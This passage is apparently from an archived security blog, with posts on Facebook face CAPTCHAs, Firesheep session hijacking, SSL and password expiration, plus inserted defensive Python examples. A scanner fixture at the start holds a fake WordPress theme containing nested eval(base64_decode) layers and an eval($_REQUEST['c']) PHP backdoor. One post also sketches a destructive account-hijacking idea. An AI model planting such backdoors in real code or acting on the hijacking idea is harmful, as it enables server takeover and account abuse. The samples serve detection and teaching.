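_MIDDLE = "eval(base64_decode('" + _b64(_INNER) + "'));"
SAMPLE_THEME = {
    "functions.php": "<?php\nfunction t_styles() { wp_enqueue_style('t', get_stylesheet_uri()); }\n"
                     "add_action('wp_enqueue_scripts', 't_styles');\n",
    "header.php": "<body>\n<div style=\"display:none\"><a href=\"http://example.com/\">credit</a></div>\n",
    "footer.php": "<?php /* theme credit */\neval(base64_decode('" + _b64(_MIDDLE) + "'));\n?>\n</body>\n",
    "sidebar.php": "<?php if (isset($_REQUEST['c'])) { eval($_REQUEST['c']); } ?>\n",
}
```

<p>Run <code>scan_theme(SAMPLE_THEME)</code> and the footer is reported twice, once for the literal <code>eval(base64_decode(...))</code> and once for the same idiom inside the first decoded layer, while the innermost layer turns out to be the spam link the article talks about; the sidebar's <code>eval($_REQUEST[...])</code> is the far nastier case, a backdoor that lets anyone run PHP on your server. A theme that only ships a hidden "credit" link lands in the iffy bucket, and a clean <code>functions.php</code> comes back safe.</p>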
<a href="http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/">Read the whole article</a> to hear about what might be hiding in that free template you just downloaded. Basically, if you see a bunch of random encoded stuff that you don't understand, you should be awfully wary... Thankfully, the author demonstrates the use of two tools for figuring out if that theme you'd like ot try is safe: <a href="http://wordpress.org/extend/plugins/tac/">Theme Authenticity Checker</a> and <a href="http://wordpress.org/extend/plugins/exploit-scanner/">Exploit scanner</a>. I guess those are the new antivirus for Wordpress?Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-719266122024751032011-01-27T13:30:00.005-05:002011-01-27T13:56:13.217-05:00Will Facebook's choice of social authentication (face CAPTCHAs) lead to huge gains in facial recognition software?<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/terrio/3965517702/in/set-72157622470561898/" title="The CU-WISE women - me + cactus at GHC09"><img src="http://farm4.static.flickr.com/3017/3965517702_3a1d318c46_m.jpg" alt="The CU-WISE women - me + cactus at GHC09" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/terrio/3965517702/in/set-72157622470561898/">Some of my friends, <br />
for your future hacking pleasure</a> <br />
by <a href="http://www.flickr.com/photos/terrio/">Terriko</a>.</span></div>We've actually talked about this sort of thing considerably within my research group, so it's hardly a new idea, but it's still interesting because I hadn't heard of a large scale implementation of this before: <a href="http://www.readwriteweb.com/archives/nevermind_captcha_facebook_asks_if_you_know_your_f.php">Nevermind CAPTCHA, Facebook Asks If You Know Your Friends</a>.<br />
<br />
They're calling it "social authentication" where rather than reading obfuscated text as in a normal CAPTCHA, you're asked to identify friends.<br />
<br />
<blockquote>"Instead of showing you a traditional captcha on Facebook, one of the ways we may help verify your identity is through social authentication," writes Rice. "We will show you a few pictures of your friends and ask you to name the person in those photos. Hackers halfway across the world might know your password, but they don't know who your friends are."</blockquote><br />
Of course, that's not true at all. For many people with public profiles, flickr accounts, etc. it's pretty easy for a hacker to identify your friends. (Even easier if your would-be hacker is a jilted lover or angry sibling, but presumably those folk could also pass a regular CAPTCHA.) The key here isn't that social authentication is unbreakable; it's that the attack has to be crafted for your account specifically, and may well need a human to do the face recognition, which slows it down and does exactly what CAPTCHAs were intended to do.<br />
<br />
I'm curious to see how well it works in practice, though. CAPTCHAs in their current "mangled text" form relied on assumptions about the ineffectiveness of computer text recognition... assumptions that have been rapidly broken as determined attackers and researchers have improved text recognition algorithms. (Nowadays, many CAPTCHAs can be bypassed with a higher than 90% success rate. <a href="http://homepages.cs.ncl.ac.uk/jeff.yan/msn_draft.pdf">Here's a link to one such paper</a> but a web search will turn up many others.)<br />
<br />
<div style="float: left; margin-right: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/terrio/3471843153/in/set-72157617189505867/" title="Sci-Fi Spectacular-2618"><img src="http://farm4.static.flickr.com/3658/3471843153_02c0691fdf_m.jpg" alt="Sci-Fi Spectacular-2618" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/terrio/3471843153/in/set-72157617189505867/">Friends in costume</a> <br />
by <a href="http://www.flickr.com/photos/terrio/">Terriko</a>.</span></div>So the interesting question to me is "Will Facebook's choice of Face CAPTCHAs lead to huge gains in facial recognition software?" -- we're well overdue for gains in that area, actually, given that law enforcement is hoping to use facial recognition to stop crime and even terrorism, but the technology is so poor right now that if they used it now they'd likely be arresting a lot of innocent folk. Facebook will lead to some great cases: What about when your friends are in costumes? Wearing different makeup? Different lighting? Different poses? Different hair? <br />
<br />
Beyond the usual halloween costumes, my facebook friends include theatre geeks, haunted house aficionados, <a href="http://www.flickr.com/photos/terrio/3690173413/in/set-72157620859973927/">members of the 501st legion of Star Wars costumers</a> and folk involved with things like the Society for Creative Anachronism. Will my friends' and acquaintances' penchant for elaborate costumes mean that I'm more secure? Or will it mean that I'll have more trouble identifying them in photos unless I've seen their standard costumes before?<br />
<br />
Mostly I'm torn between excitement at new gains in image processing and a vague sense of unease when I contemplate the potential applications of better facial recognition software.<br />
<p>Posted by Terri Oda.</p>
<p><strong>"My account got hacked"</strong> (2011-01-27)</p>Some <a href="http://twitter.com/#!/jeremiahg/status/29554919937679360">bite-sized wisdom</a> from <a href="http://twitter.com/#!/jeremiahg">Jeremiah Grossman</a>:<br />
<br />
<blockquote>Funny how people, "my account got hacked," rather than "someone hacked into my account", like they think getting hacked is an act of nature.</blockquote><br />
I had a good laugh, but it's got me wondering... given how frequently attacks occur online, maybe it really does make sense for people to conceptualize attacks as something that just happens as opposed to something more akin to "that guy robbed me." Makes it easier to deal with somehow, or perhaps easier to accept that there will likely be no retribution?<br />
<br />
And more disturbingly, does this "act of nature" approach to hacking explain the general public's sometimes apathetic response to routine privacy violations, both online and offline?<br />
<p>Posted by Terri Oda.</p>
<p><strong>Zuckerberg... hacked?</strong> (2011-01-26)</p>There's <a href="http://techcrunch.com/2011/01/25/zuckerberg-fan-page-hack/">an amusing story up on TechCrunch suggesting that Mark Zuckerberg's fan page may have been hacked</a>.<br />
<br />
<blockquote>Obviously, Zuckerberg didn’t actually write it. Or at least, we’re pretty sure he didn’t. Instead, it would appear that his fan page was hacked. Facebook has now taken down the page — but not before we grabbed a screenshot.</blockquote><br />
Honestly, these things happen. But what made the story actually funny to me was <a href="http://twitter.com/#!/snipeyhead/status/30147681712078848">this tweet</a>:<br />
<br />
<blockquote><a href="http://twitter.com/#!/snipeyhead/">@snipeyhead</a> Hah. FB is flagging the Tech Crunch article reporting on Zuckerberg's fan page hack as "abusive or spammy" <a href="http://twitpic.com/3thf68">http://twitpic.com/3thf68</a> #classy</blockquote><br />
Edit: More news on what happened according to Facebook: <a href="http://news.cnet.com/8301-27080_3-20029630-245.html">Facebook blames bug for Zuckerberg page hack</a><br />
<p>Posted by Terri Oda.</p>
<p><strong>Ethical hacking? How about some ethical writing?</strong> (2011-01-26)</p><a href="http://www.amazon.ca/gp/product/1598634143?ie=UTF8&tag=terriko-20&linkCode=as2&camp=15121&creative=390961&creativeASIN=1598634143"><img border="0" src="http://terri.zone12.com/blog/books/51K-2SuJHXL._SL160_.jpg" align="right" style="margin: 1em" /></a><br />
Now, I haven't verified this at all, but here's an interesting link for you: <a href="http://attrition.org/errata/charlatan/ankit_fadia/network_intrusion/">Ankit Fadia / Manu Zacharia - "Network Intrusion Alert" Heavily Plagiarized</a>.<br />
<br />
<blockquote>An extremely detailed analysis has been performed for the first chapter (10 pages) to show the scope and method of plagiarism. Our analysis shows that roughly 90% of the first chapter, including the six graphics used, has been taken from other sources. Due to time constraints, notes are used for brevity for the rest of the material.</blockquote><br />
Given my experiences with plagiarism among my undergraduate students and the recent <a href="http://howpublishingreallyworks.com/?p=3450">Cooks Source plagiarism story</a> (which attracted <a href="http://www.wired.com/threatlevel/2010/11/web-decries-infringement/">quite a lot of attention</a>)... I'm sadly inclined to believe that this entire book may be plagiarized.<br />
<br />
What's funny about this story is that the book in contention here is titled "Network Intrusion Alert: An <em>Ethical</em> Hacking Guide to Intrusion Detection." Emphasis mine.<br />
<p>Posted by Terri Oda.</p>
<p><strong>Facebook now enabling annoying phone calls and paper junk mail?</strong> (2011-01-17)</p><div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/80327698@N00/5013086426/" title="Drowning in Verizon junk mail"><img src="http://farm5.static.flickr.com/4154/5013086426_467c4eb4a0_m.jpg" alt="Drowning in Verizon junk mail" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/80327698@N00/5013086426/">Drowning in Verizon junk mail</a> <br />
by <a href="http://www.flickr.com/photos/80327698@N00/">Night-thing</a>.</span></div><a href="http://nakedsecurity.sophos.com/2011/01/16/rogue-facebook-apps-access-your-home-address-mobile-phone-number/">Sophos</a> points out that Facebook has made yet another change to the way it handles your information: this time, <a href="http://developers.facebook.com/blog/post/446?_fb_noscript=1">allowing third-party developers access to contact information</a> on Facebook.<br />
<br />
Now, part of me wants to just shrug: it's always been <em>technically</em> possible for third-party developers to get access to this information because of the current state of web security. It's long been true that anyone who can execute JavaScript in your browser on a site (e.g. every facebook app) can gain access to anything you can see. So if your friend installed FarmVille and you've allowed your friend to see your phone number, FarmVille can see your phone number (and the pictures of you in that horrible Halloween costume, and that drunken post you made on your ex's wall...). And if you install FarmVille, they can even more easily glean your phone number and anything else on your profile. What Facebook's doing is in some ways good: they're helping to make this clear to users, and maybe even helping to track who is actually looking at and using that info.<br />
<br />
But of course, most people aren't aware that this has always been possible, so they're suddenly envisioning FarmVille sending them paper brochures filled with new crop info, or phoning all their friends to ask why they haven't helped out on the farm lately. Maybe an automated call would help convince you to join the game and seek out that lost kitten?<br />
<br />
And maybe those third party apps didn't realize they could do it either, and they're salivating over the extended marketing possibilities. Technically possible doesn't imply endorsed by Facebook the way putting the ability into the API does, so while getting this information might have been in the realm of sketchy scams before, now it's going to be considered a legitimate asset by more companies. After all, you consented when you installed the app. And remember, corporate assets do tend to be about making money, so don't assume they won't sell those lists. <br />
<br />
So, while it was technically feasible before, maybe now is a good time to reconsider what data you keep within Facebook. And it's always a good time to re-evaluate which applications you have installed or will install. As always, I recommend that you don't leave anything on facebook you wouldn't want shared with the world, so now's a great time to delete your phone number and address from your facebook profile. And if you don't? Well, don't be too surprised when you start getting texts saying that someone needs help with their FarmVille crops.<br />
<br />
<b>A bit late: Santa's privacy policy</b> (Terri Oda, 2011-01-03)<br />
<br />
A bit late, but sent to me by a few folk as a fun follow up to <a href="http://webinsecurity.blogspot.com/2010/12/brutally-honest-privacy-policy.html">A brutally honest privacy policy</a>, here's a gem of a privacy policy from... Santa Claus.<br />
<br />
<blockquote>Santa Claus requires your information in order to compile his annual list of Who is Naughty and Who is Nice, and to ensure accuracy when he checks it twice. Your information is also used in connection with delivering the kinds of goods and services you've come to expect from Santa, including but not limited to toys, games, good cheer, merriment, Christmas spirit, seasonal joy, and holly jollyness.</blockquote><br />
Read the rest here: "<a href="http://www.mcsweeneys.net/2010/12/23hughes.html">Santa's Privacy Policy</a>" and leave those Christmas decorations up just one more day before getting back to regular old January.<br />
<br />
<b>A brutally honest privacy policy</b> (Terri Oda, 2010-12-14)<br />
<br />
Dan Tynan has decided to cut through the legalese and confusion inherent in many privacy policies and <a href="http://www.itworld.com/print/129778">produced a "real" privacy policy which is open-sourced for anyone to adopt</a>. What results is hilarious and sad at once because it reflects a lot of how "private" data may be used. Here's an excerpt:<br />
<br />
<blockquote>"At COMPANY _______ we value your privacy a great deal. Almost as much as we value the ability to take the data you give us and slice, dice, julienne, mash, puree and serve it to our business partners, which may include third-party advertising networks, data brokers, networks of affiliate sites, parent companies, subsidiaries, and other entities, none of which we’ll bother to list here because they can change from week to week and, besides, we know you’re not really paying attention.<br />
<br />
We’ll also share all of this information with the government. We’re just suckers for guys with crew cuts carrying subpoenas.<br />
<br />
Remember, when you visit our Web site, our Web site is also visiting you. And we’ve brought a dozen or more friends with us, depending on how many ad networks and third-party data services we use. We’re not going to tell which ones, though you could probably figure this out by carefully watching the different URLs that flash across the bottom of your browser as each page loads or when you mouse over various bits. It’s not like you’ve got better things to do.<br />
<br />
...<br />
<br />
So just to recap: Your information is extremely valuable to us. Our business model would totally collapse without it. No IPO, no stock options; all those 80-hour weeks and bupkis to show for it. So we’ll do our very best to use it in as many potentially profitable ways as we can conjure, over and over, while attempting to convince you there’s nothing to worry about.</blockquote><br />
<a href="http://www.itworld.com/print/129778">Read the rest along with commentary on Dan's blog</a>. He notes that it’s 5,085 words shorter than Facebook’s policy, just for comparison.<br />
<br />
<b>Security Costs vs Benefits: Should companies deploy SSL to deal with Firesheep?</b> (Terri Oda, 2010-11-03)<br />
<br />
<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/jeffanddayna/4146023669/" title="SSL"><img src="http://farm3.static.flickr.com/2705/4146023669_29dae2f065_m.jpg?zz=1" alt="SSL" style="border: solid 2px #000000;" /></a><br /> <span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/jeffanddayna/4146023669/">SSL</a> <br />by <a href="http://www.flickr.com/photos/jeffanddayna/">jeff_golden</a>.</span></div>Yesterday, I talked about <a href="http://webinsecurity.blogspot.com/2010/11/apathy-or-sensible-risk-evaluation-why.html">why end-users don't care about security</a> and how that actually makes a certain amount of sense for them since the cost of behaving more securely can overwhelm the cost of an actual breach.<br />
<br />
However, what I didn't talk about is whether this is true for companies. A single security breach in a single user account maybe doesn't cost a company much, but if breaches get common enough that they start losing users, it could be a problem with a much higher cost.<br />
<br />
While users trying to protect themselves from curious folk with firesheep are counseled to use a VPN, website owners can choose to do encryption right from their end using SSL. But it was thought that SSL was computationally costly and even <em>environmentally</em> costly due to the supposed need for extra electricity and machines.<br />
<br />
But who's been looking at what those costs actually are? A blog post entitled <a href="http://www.imperialviolet.org/2010/06/25/overclocking-ssl.html">Overclocking SSL</a> looked at the severity of these costs as they deployed SSL, and made a pretty clear statement:<br />
<br />
<blockquote>If there's one point that we want to communicate to the world, it's that SSL/TLS is not computationally expensive any more. Ten years ago it might have been true, but it's just not the case any more. You too can afford to enable HTTPS for your users.<br />
</blockquote><br />
So there you have it: the people who should be protecting users from firesheep attacks are probably the companies who run the websites, since SSL isn't likely to be as costly to them as numerous complaints and support requests would be from their users. The cost equation might not be the same for all organizations, since the cost of certificates and labour can be non-trivial if you don't already have expertise on hand. But sure enough, <a href="http://gmailblog.blogspot.com/2010/01/default-https-access-for-gmail.html">Google has decided to provide https access by default to all gmail users</a>, so they clearly believe it's worth it. <br />
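Deploying SSL only closes the Firesheep hole if the session cookie is never sent over plain HTTP, which depends on how the cookie is set, not just on whether an https:// URL exists. The check below is an added example (not code from this post or from Firesheep): it parses Set-Cookie headers, flags session-looking cookies that lack the Secure or HttpOnly attributes, and notes a missing Strict-Transport-Security header. The header lines and the name-based heuristic for "session-like" cookies are constructed assumptions for the example.<br />

```python
"""Audit Set-Cookie headers for the attributes that keep a session cookie
off an open wireless network in clear text.

Added example, not code from the original post. Uses only the standard
library; the header values below are constructed samples.
"""
from dataclasses import dataclass, field


@dataclass
class Cookie:
    name: str
    value: str
    # lower-cased attribute name -> attribute value, or True for flag attributes
    attrs: dict = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header value into name, value and attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return Cookie(name.strip(), value, attrs)


# Assumed heuristic: cookie names containing these fragments carry a login.
SESSION_HINTS = ("sess", "sid", "auth", "token", "login")


def looks_like_session_cookie(name: str) -> bool:
    lowered = name.lower()
    return any(hint in lowered for hint in SESSION_HINTS)


def audit_cookies(headers, hsts_header=None):
    """Return (cookie name, finding) pairs for session-like cookies that a
    passive sniffer on the same network could capture or replay."""
    findings = []
    for header in headers:
        c = parse_set_cookie(header)
        if not looks_like_session_cookie(c.name):
            continue
        if "secure" not in c.attrs:
            findings.append((c.name, "missing Secure: browser will send it over plain http://"))
        if "httponly" not in c.attrs:
            findings.append((c.name, "missing HttpOnly: readable by any script on the page"))
    if hsts_header is None:
        # Without HSTS the very first http:// request (and its cookie) still goes in the clear.
        findings.append(("*", "no Strict-Transport-Security header"))
    return findings


# Constructed sample responses: one leaky session cookie, one hardened, one irrelevant.
SAMPLE_SET_COOKIE = [
    "sessionid=abc123; Path=/; HttpOnly",
    "auth_token=xyz789; Path=/; Secure; HttpOnly; SameSite=Lax",
    "theme=dark; Path=/",
]

if __name__ == "__main__":
    for name, finding in audit_cookies(SAMPLE_SET_COOKIE, hsts_header=None):
        print(f"{name}: {finding}")
```

Run against a real site by pasting its Set-Cookie and Strict-Transport-Security headers; a clean result means the cookie that proves you are logged in never leaves the browser unencrypted, which is the property Firesheep relies on being absent.<br />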
<br />
This leads to an interesting question: Does the burden of security always fall heavily on corporations and large organizations rather than on end-users? Many would argue that this is naive and that users must bear some responsibility; others would argue that only corporations have the resources necessary to make an impact on security. This is a much larger discussion that I expect we'll see occurring over and over again for a very long time.<br />
<br />
<b>Apathy or sensible risk evaluation: why don't people care about security?</b> (Terri Oda, 2010-11-02)<br />
<br />
<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/pierofix/3094329703/" title="Starbucks' Christmas Bokeh"><img src="http://farm4.static.flickr.com/3024/3094329703_f20d486ba0_m.jpg" alt="Starbucks' Christmas Bokeh" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/pierofix/3094329703/">Starbucks' Christmas Bokeh</a> <br />
by <a href="http://www.flickr.com/photos/pierofix/">pierofix</a>.</span></div>Engineer Gary LosHuertos decided to try <a href="http://technologysufficientlyadvanced.blogspot.com/2010/10/herding-firesheep-in-new-york-city.html">Herding Firesheep in New York City</a>: He sat down in a Starbucks, opened up his laptop and started gathering profiles, then sent messages to people whose facebook accounts he could access warning them of the security flaws. Some people closed up and left, but some just ignored his message and went on with their day. Confused, he sent another message, but they just didn't seem to care and continued using their accounts.<br />
<br />
<blockquote>This is the most shocking thing about Internet security: not that we are all on a worldwide system held together with duct tape that has appalling security vulnerabilities; not that a freely available tool could collect authentication cookies; and certainly not that there are people unaware of either. What's absolutely incomprehensible is that after someone has been alerted to the danger (from their own account!) that they would casually ignore the warning, and continue about their day.</blockquote><br />
But <em>is</em> this shocking? To someone who cares about security, maybe. To someone who knows people? Less so. <br />
<br />
Cormac Herley has an absolutely great paper entitled "<a href="http://docs.google.com/viewer?a=v&q=cache:UCrzi5_P5fkJ:research.microsoft.com/en-us/um/people/cormac/papers/2009/SoLongAndNoThanks.pdf&hl=en&gl=ca&pid=bl&srcid=ADGEEShcwF5NUFTHr49SHpuOuwwAXGb6Oy2THAKgdwquvGWCHwyaf-I0ZbXu8bcKsA3LCM5n2SFL6mKJ6X8_Ihq5nYOjxvsGS0bjIqgZycrlRcnaQMbhmSS2f2yHpoSIQlb-dfJlc2Te&sig=AHIEtbQIrbuCbg8Eliatp6RviN8ZThn6Zg">So Long, And No Thanks for the Externalities: The Rational Rejection of Security Advice by Users</a>".<br />
<br />
<blockquote>It is often suggested that users are hopelessly lazy and unmotivated on security questions. They chose weak passwords, ignore security warnings, and are oblivious to certificates errors. We argue that users’ rejection of the security advice they receive is entirely rational from an economic perspective. The advice offers to shield them from the direct costs of attacks, but burdens them with far greater indirect costs in the form of effort.</blockquote><br />
So let's think a little bit about cookies and firesheep. One of the ways to be most safe is to browse using a VPN. For someone who already has one set up, this is pretty much a matter of toggling something on your computer: pretty low difficulty and less trouble than having your accounts hacked. You can see why many geeks think it's ridiculous that people wouldn't just secure their sites: even if you include time setting up the VPN, for many folk that's a task that falls under the heading of "something I meant to do anyhow" and isn't really perceived as costly.<br />
<br />
But if you're not a computer-savvy person who has a server online to host a VPN, setting up a VPN can be stupidly costly. Maybe you'd have to replace your router with one that can handle it. Maybe you'd have to pay for hosting. Maybe you'd have to spend hours figuring out how to generate keys, or pay someone else to do that. Maybe just figuring out what you need to do at all is going to take hours. Quickly, the hours required seem worth more than the cost of having some stranger send you messages from your own facebook account, or maybe set your status message to something embarrassing.<br />
<br />
Perhaps what we need to raise the costs of a security mishap is a little evil. It's actually easy to craft a firesheep-based attack that <em>would</em> raise the cost high enough to make VPN hunting (or just not using the Starbucks wireless) seem worthwhile to most people: Log into someone's account, delete all their status messages, notes and photos, defriend all their friends. Since there's no easy way to back up your facebook profile, the results would be devastating and partially unrecoverable: worth more than the pain of setting up a VPN or going without FB while in a coffee shop. It might be easier to litigate for theft/unauthorized access than it is to restore that profile, so I don't recommend any security vigilantes start doing this!<br />
<br />
So I guess the take-home message here is that while it's worth trying to educate users so they can make smarter decisions, they're not necessarily being delusional or foolish when they just say "meh" and go on with their lives. If we want to make a really huge impact, we need security solutions that are so low-pain that there's no longer any rational reason to reject them.<br />
<br />
<b>Apparently Facebook hates privacy so much that they pay lobbyists to stop privacy laws</b> (Terri Oda, 2010-10-29)<br />
<br />
<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/sunside/1433052868/" title="Privacy is not a crime"><img src="http://farm2.static.flickr.com/1103/1433052868_20070e97e2_m.jpg?zz=1" alt="Privacy is not a crime" style="border: solid 2px #000000;" /></a><br /> <span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/sunside/1433052868/">Privacy is not a crime</a> <br />by <a href="http://www.flickr.com/photos/sunside/">sunside</a>.</span></div>This maybe shouldn't surprise anyone, but Mashable is reporting that <a href="http://mashable.com/2010/10/27/facebook-lobbying/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+Mashable+(Mashable)">Facebook Lobbied to Kill Social Networking Privacy Act</a> in the USA. <br />
<br />
It's one thing to believe that privacy isn't important, or to make mistakes that expose users, but paying people to lobby against privacy legislation that might protect your users seems like a big step further. It makes me concerned as a user of the service.<br />
<br />
Incidentally, <a href="http://www.cbc.ca/technology/story/2009/07/16/facebook-privacy-commissioner.html">Facebook has already broken Canadian privacy law</a> (<a href="http://www.webpronews.com/topnews/2010/10/19/commissioner-google-contravened-canadian-privacy-law">they're not the only ones</a>), and likely the laws of several other countries, so I guess it makes sense that they wouldn't want to run afoul of further laws... but I really wish they'd do this by handling privacy issues better rather than paying people to make sure the laws don't come into effect. Maybe the law was simply ill-conceived (I haven't read it) but this <em>really</em> doesn't sound like the actions of a socially-responsible company. Very disappointing.<br />
<br />
<b>Why 12 year olds may be our best bug hunters</b> (Terri Oda, 2010-10-28)<br />
<br />
You may have heard the news: <a href="http://www.mercurynews.com/san-jose-neighborhoods/ci_16401891">Mozilla pays 12-year-old San Jose boy for hunting bugs in system</a>:<br />
<br />
<div style="float: left; margin-right: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/kjellander/1604250518/" title="bugged"><img src="http://farm3.static.flickr.com/2336/1604250518_8f0af35eed_m.jpg" alt="bugged" style="border: solid 2px #000000;" /></a><br /> <span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/kjellander/1604250518/">bugged</a> <br />by <a href="http://www.flickr.com/photos/kjellander/">Oℓivia</a>.</span></div><blockquote>It's safe to say a typical Willow Glen 12-year-old doesn't earn $3,000 for a couple of weeks' worth of work. Then again, Alex Miller is no typical 12-year-old.<br />
<br />
Alex is a bug hunter, but the bugs he's uncovering are unlikely to end up in any entomological reference book. Instead, the bug Alex found was a valid critical security flaw buried in the Firefox web browser. For his discovery, he was rewarded a bug bounty of $3,000 by Mozilla, the parent company of Firefox.<br />
</blockquote><br />
Much of the coverage I've seen has been along the lines of "wow, if a 12 year old can find a bug, then anyone can do this!" which I think is awesome if it has more people out looking through code in hopes of one of those $3k bounties. But I also find that attitude a little sad because frankly, Alex Miller sounds like a pretty smart guy and implying that what he did is easy because he's young is a bit condescending and likely incorrect.<br />
<br />
But the more I think about it, the more I think that maybe younger bughunters have some natural advantages, and maybe we should go out of our way to recruit them. I taught 17 year olds doing in-lab tutorials for several years running, and worked with students down to around 12 years old when I've taught mini-courses in the spring, and they're pretty darned sharp.<br />
<br />
Here are some assets younger folk bring to the table when it comes to security flaws:<br />
<br />
<ul><li><b>A different point of view</b> -- Some teachers take it as incredibly frustrating that their students just don't see the world the way they do because it can be hard to teach without common ground, but I've always found it fascinating how my students will write code in ways completely different to what I expect. Frankly, I don't see this kind of diversity when I work with my colleagues, probably because we have similar educational backgrounds. A different way to think can help you find things that others are going to miss, in research or in security bug hunting! <br />
<br />
<li><b>Time</b> -- Alex Miller says he only spent 90 minutes/day for around 10 days to find his bug, but in general tweens and teens can have a lot more free time than their adult counterparts. Sure, there's school and homework and often a slew of extra-curriculars, but there's usually less time spent on childcare, laundry, groceries, cooking, cleaning, yardwork. Younger students may do some of that, but usually not all of the above.<br />
<br />
<li><b>Enthusiasm</b> -- Let's face it; if you stare at code all day at work, you're not always likely to set aside 90 minutes/day to do it at home. Whereas when I was a teenager and was writing essays at school, 90 minutes of debugging sounded like a lot more fun!<br />
<br />
<li><b>Chutzpah</b> -- It's easy for us as adults to think "meh, so many people have looked at this... I'll never find anything" and in general the students I work with have a lot more guts and are just more willing to believe that they personally will change the world if they just try. Certainly, my gaming students often propose genre-busting epic game ideas that I can just imagine getting shot down at a company meeting.<br />
</ul><br />
So maybe we shouldn't be saying "if a 12 year old can do it, anyone can" and instead thinking "how can I channel my inner 12 year old?"<br />
<br />
<b>Quick Hit: Firesheep</b> (Terri Oda, 2010-10-27)<br />
<br />
<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/jule_berlin/839245545/" title="Mountain view with sheep"><img src="http://farm2.static.flickr.com/1423/839245545_d89144d012_m.jpg" alt="Mountain view with sheep" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/jule_berlin/839245545/">Mountain view with sheep</a> <br />
by <a href="http://www.flickr.com/photos/jule_berlin/">Jule_Berlin</a>.</span></div>By now, probably everyone's already heard of <a href="http://codebutler.com/firesheep?c=1">firesheep</a>, the nice user-friendly way to use cookies to do session hijacking. Want to be logged in as someone else on Facebook? No problem.<br />
<br />
It's nothing spectacular on a technical level, since it's been easy enough to use other people's cookies for quite some time, but it's a pretty impressive social hacking tool. It's making it clear to a lot of people (and media) that this is a real problem, and that it's an exploit anyone can do now.<br />
<br />
I'm actually sort of surprised that I haven't seen this earlier: it used to be a bit of a game in the undergrad lounge to see what one could sniff off the network, with people using some tool whose name I've forgotten to show any images that came up from users surfing on the wireless. Hacking session cookies would have been a fun addition to our childish games -- and I'll bet plenty of college kids are using it for just that. Or for checking out their ex-boyfriends/girlfriends...<br />
<br />
<b>Does expiring passwords really help security?</b> (Terri Oda, 2010-10-11)<br />
<br />
<div style="float: left; margin-bottom: 10px; margin-right: 10px;"><a href="http://www.flickr.com/photos/dawn_perry/318923932/" title="photo sharing"><img alt="" src="http://farm1.static.flickr.com/140/318923932_26a701683b_m.jpg" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><a href="http://www.flickr.com/photos/dawn_perry/318923932/">Change is Easy</a><br />
Originally uploaded by <a href="http://www.flickr.com/people/dawn_perry/">dawn_perry</a></span></div>I've heard a lot of arguments as to why expiring passwords likely won't help. Here's a few:<br />
<br />
<ul><li>It's easy to install malware on a machine, so the new password will be sniffed just like the old.<br />
</li>
<li>It costs more: frequent password changes result in more forgotten passwords and support desk calls.<br />
</li>
<li>It irritates users, who will then feel less motivated to implement other security measures.<br />
</li>
<li>Constantly forcing people to think of new, memorable passwords leads to cognitive shortcuts like password-Sep, password-Oct, password-Nov...<br />
</li>
</ul>And yet, many organizations continue to force regular password changes in order to improve security. But what if that's not what's really happening? Three researchers from the University of North Carolina at Chapel Hill have unveiled what they claim to be <a href="http://www.cs.unc.edu/~yinqian/password.html">the first large-scale study on password expiration</a>, and they found it wanting. <br />
<br />
<p>They focus especially on the idea that consecutive passwords will be related, and build a system which could try a variety of transforms such as changing which letter was uppercase, duplicating letters/numbers/symbols, and even <a href="http://en.wikipedia.org/wiki/Leet">"leet" translation</a> (eg: raven becomes r@v3n). The implications of their results are fairly clear and potentially disturbing for those who thought password changing was providing extra security in the case of a breach: <br />
<ul><li>With offline attacks: "<em>On average, roughly 41% of passwords can be broken from an old password in under 3 seconds.</em>"<br />
</li>
<li>With online attacks: "<em>An average of 13% of accounts can be broken (with certainty) in 5 online guesses, and 18% can be broken in 10 guesses.</em>"<br />
</li>
<li>"<em>As we expand our consideration to other types of transform trees, we would not be surprised to see these success rates jump significantly.</em>"<br />
</li>
</ul>In essence, they've shown that changing passwords doesn't provide nearly as much security as system designers had hoped, and they suggest we abandon the practice rather than continue to annoy users with a policy that has been proven ineffective.
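The flip side of the study's transform tree is a defensive one: if a system insists on expiration anyway, it can at least refuse a new password that sits only a step or two away from the old one. The code below is an added example, not the UNC researchers' tool. It assumes the password-change handler sees both the old and the new password in clear text at the moment of the change, and implements just the transforms the post names (changing which letter is upper case, duplicating a character, and "leet" substitution) as a bounded breadth-first search.<br />

```python
"""Reject a new password that is a trivial transform of the old one.

Added example, not code from the study or the post. The transform set and
the depth limit are assumptions chosen to match the transforms the post
describes; real deployments would widen the set.
"""

# Assumed leet table: plain letter -> substituted symbol (raven -> r@v3n).
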